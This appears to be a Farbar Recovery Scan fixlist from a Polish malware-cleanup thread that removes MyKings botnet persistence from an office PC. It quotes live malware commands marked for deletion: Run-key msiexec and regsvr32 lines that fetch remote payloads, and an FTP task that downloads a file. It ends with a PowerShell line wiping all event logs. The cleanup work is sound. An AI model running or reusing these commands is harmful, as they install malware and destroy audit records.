CloseProcesses:
CreateRestorePoint:
HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q <==== UWAGA
HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll <==== UWAGA
HKU\S-1-5-21-2466349035-1162948755-3129390652-1001\...\MountPoints2: {ad9cb492-4fac-11e3-88ae-806e6f6e6963} - D:\start.exe start.html
HKU\S-1-5-21-2466349035-1162948755-3129390652-1012\...\MountPoints2: {ad9cb492-4fac-11e3-88ae-806e6f6e6963} - D:\Setup.exe
HKU\S-1-5-21-2466349035-1162948755-3129390652-500\...\MountPoints2: {ad9cb492-4fac-11e3-88ae-806e6f6e6963} - D:\Setup.exe
ShortcutTarget: directINTEGRATOR ST5 — skrót.lnk -> C:\$Recycle.Bin\S-1-5-21-2466349035-1162948755-3129390652-500\$RHV5B1Y.exe (Brak pliku)
GroupPolicy: Ograniczenia <==== UWAGA
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{b8e0babf-12df-48c0-99b0-da1cb82af076} <==== UWAGA (Ograniczenia - IP)
Tcpip\..\Interfaces\{717D4596-8E28-4A42-856C-C88BCE0D1E82}: [NameServer] 194.204.152.34,8.8.8.8
Tcpip\..\Interfaces\{717D4596-8E28-4A42-856C-C88BCE0D1E82}: [DhcpNameServer] 194.204.159.1 194.204.152.34
Tcpip\..\Interfaces\{8CCD8AED-302B-47A5-BD18-E8C88C3099CC}: [DhcpNameServer] 192.168.8.1 192.168.8.1
Tcpip\..\Interfaces\{F4571956-A69A-4A30-9573-C54768218EEA}: [DhcpNameServer] 192.168.8.1 192.168.8.1
Task: {255F93C1-A560-4512-981F-75082BDF597D} - System32\Tasks\Mysa2 => cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== UWAGA
Task: {D42BEA24-EF4D-4AFF-AAAB-6E9164A6FE30} - \Mysa -> Brak pliku <==== UWAGA
HKU\S-1-5-21-2466349035-1162948755-3129390652-1007\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp
HKU\S-1-5-21-2466349035-1162948755-3129390652-1009\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp
HKU\S-1-5-21-2466349035-1162948755-3129390652-1010\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp
HKU\S-1-5-21-2466349035-1162948755-3129390652-1011\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp
HKU\S-1-5-21-2466349035-1162948755-3129390652-1013\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp
HKU\S-1-5-21-2466349035-1162948755-3129390652-1015\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp
HKU\S-1-5-21-2466349035-1162948755-3129390652-500\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp
SearchScopes: HKU\S-1-5-21-2466349035-1162948755-3129390652-500 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = 
Toolbar: HKU\S-1-5-21-2466349035-1162948755-3129390652-1001 -> Brak nazwy - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  Brak pliku
Toolbar: HKU\S-1-5-21-2466349035-1162948755-3129390652-1017 -> Brak nazwy - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  Brak pliku
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird => nie znaleziono
FF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird => nie znaleziono
FF Plugin: @microsoft.com/GENUINE -> disabled [Brak pliku]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Brak pliku]
CHR HKU\S-1-5-21-2466349035-1162948755-3129390652-1009\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-2466349035-1162948755-3129390652-500\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\Users\ADMINI~1.ITM\AppData\Local\Google\Drive\user_default\apdfllckaahabafndbhieahigkjlhalf_live.crx [2017-07-12]
CHR HKU\S-1-5-21-2466349035-1162948755-3129390652-500\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh] - hxxps://clients2.google.com/service/update2/crx
ContextMenuHandlers1: [MVDShlext] -> {027B567F-6B25-42C1-9C0B-5CE8E04024BD} => C:\Program Files (x86)\Miray Virtual Disk 5.0\mvdextx64.dll -> Brak pliku
ContextMenuHandlers4: [MVDShlext] -> {027B567F-6B25-42C1-9C0B-5CE8E04024BD} => C:\Program Files (x86)\Miray Virtual Disk 5.0\mvdextx64.dll -> Brak pliku
WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== UWAGA
C:\Users\Administrator.itm-Komputer\Dysk Google\ACT_Monika_i_Dorota\etykiety\Glony\Foto\biohurt\Skrót (2) do BIO RAJ ulotki.lnk
C:\Users\Administrator.itm-Komputer\Dysk Google\ACT_Monika_i_Dorota\etykiety\Glony\Foto\biohurt\Skrót do BIO RAJ ulotki.lnk
C:\Users\Administrator.itm-Komputer\Dysk Google\ACT_Monika_i_Dorota\etykiety\Glony\Foto\biohurt\Skrót do Caribo_400g_Beutel_pr.lnk
C:\Users\Administrator.itm-Komputer\Dysk Google\ACT_Monika_i_Dorota\etykiety\Glony\Foto\biohurt\Skrót do FOLDER bakalie.lnk
C:\Users\Administrator.itm-Komputer\Dysk Google\ACT_Monika_i_Dorota\etykiety\Glony\Foto\biohurt\Skrót do FOLDER KASZE.lnk
C:\Users\Administrator.itm-Komputer\Dysk Google\ACT_Monika_i_Dorota\etykiety\Glony\Foto\biohurt\Skrót do fOLDER MAKARONY.lnk
C:\Users\Administrator.itm-Komputer\Dysk Google\ACT_Monika_i_Dorota\etykiety\Glony\Foto\biohurt\Skrót do fOLDER MĄKI.lnk
C:\Users\Administrator.itm-Komputer\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\directINTEGRATOR ST5 — skrót.lnk
C:\Users\Dorota Nizio\Desktop\directINTEGRATOR ST.lnk
C:\Users\monika\Desktop\directINTEGRATOR ST.lnk
C:\Users\monika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\directSOFT\directINTEGRATOR ST - wersja dla SubiektGT\directINTEGRATOR ST.lnk
C:\Users\monika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\directSOFT\directINTEGRATOR ST - wersja dla SubiektGT\Konfigurator.lnk
C:\Users\monika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\directSOFT\directINTEGRATOR ST - wersja dla SubiektGT\Odinstaluj program directINTEGRATOR ST5.lnk
C:\Users\monika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\directSOFT\directINTEGRATOR ST - wersja dla SubiektGT\Pomoc.lnk
C:\Users\rk\Desktop\directINTEGRATOR ST.lnk
C:\Users\rk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\directSOFT\directINTEGRATOR ST - wersja dla SubiektGT\directINTEGRATOR ST.lnk
C:\Users\rk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\directSOFT\directINTEGRATOR ST - wersja dla SubiektGT\Konfigurator.lnk
C:\Users\rk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\directSOFT\directINTEGRATOR ST - wersja dla SubiektGT\Odinstaluj program directINTEGRATOR ST5.lnk
C:\Users\rk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\directSOFT\directINTEGRATOR ST - wersja dla SubiektGT\Pomoc.lnk
C:\Users\sklep\Links\Baza 2014.lnk
C:\Users\sklep\Links\Kontakty.lnk
C:\Users\sklep\Links\Zamówienia 2014.lnk
C:\Users\sklep\Desktop\directINTEGRATOR ST.lnk
C:\Users\sklep\Desktop\Konfigurator.exe — skrót.lnk
C:\Users\sklep\Desktop\TeamViewer.exe — skrót.lnk
C:\Users\sklep\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Adobe Reader XI.lnk
C:\Users\sklep\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\directINTEGRATOR ST5.exe — skrót.lnk
Task: {259ABC29-583B-4F53-AB39-ABB2BB899C8B} - System32\Tasks\GoogleUpdateTaskMachineUA1d08ef27c6ab824 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {26D42EF7-09D2-449C-A542-EFBAF26BC7FB} - System32\Tasks\GoogleUpdateTaskMachineUA1d15d6e49ad1187 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {53DBE49D-B85E-4595-AEB6-3E06900C0505} - System32\Tasks\GoogleUpdateTaskMachineUA1d12cb517fef1d9 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {553973E7-F010-4487-950B-2B1BC2BB8B44} - System32\Tasks\GoogleUpdateTaskMachineCore1d0e165d2b705aa => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {633E7B2E-951A-42B9-9D3B-3120B90428FA} - System32\Tasks\GoogleUpdateTaskMachineUA1d0f0c96150e1d1 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {6CA8B592-319C-4078-98A6-D3980804E011} - System32\Tasks\GoogleUpdateTaskMachineCore1d0bf602f0bf315 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {9D9D57A7-FB5D-428E-9820-29C863F958B8} - System32\Tasks\GoogleUpdateTaskMachineUA1d04054a84f15fb => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {AE498AC0-CAC8-48B6-9107-0BC67124AFD4} - System32\Tasks\GoogleUpdateTaskMachineUA1cf8c891c7f8242 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {B4A771C0-8AC1-440D-8AA1-3B121A306948} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {BE04FADB-7376-4AC0-BFBF-A00561B6795D} - System32\Tasks\GoogleUpdateTaskMachineCore1d15d6e49895ce3 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {D534EC0F-2373-424F-BA34-5408574E7432} - System32\Tasks\GoogleUpdateTaskMachineUA1d0bf602f2fa7b9 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {FE78F8D2-91FD-4B99-A5B2-3C8ECF460807} - System32\Tasks\GoogleUpdateTaskMachineCore1d0f0c9612d2d2d => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
EmptyTemp:
RemoveProxy:
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
CMD: ipconfig /flushdns